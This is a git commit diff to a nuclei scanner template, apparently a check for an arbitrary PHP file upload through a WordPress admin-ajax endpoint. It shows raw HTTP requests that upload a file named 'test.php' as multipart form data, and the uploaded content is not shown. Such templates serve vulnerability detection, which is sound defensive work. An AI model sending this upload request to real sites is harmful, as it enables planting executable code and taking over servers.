Merge branch 'main' of https://github.com/E1A/nuclei-templates into pr/8118

patch-1
sandeep 2023-08-31 01:18:54 +05:30
commit 50ebcba392
1 changed files with 4 additions and 1 deletions

View File

@ -24,14 +24,17 @@ info:
http:
- raw:
- |
GET /?p=1 HTTP/1.1
GET {{Path}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
Origin: {{BaseURL}}
Referer: {{BaseURL}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php"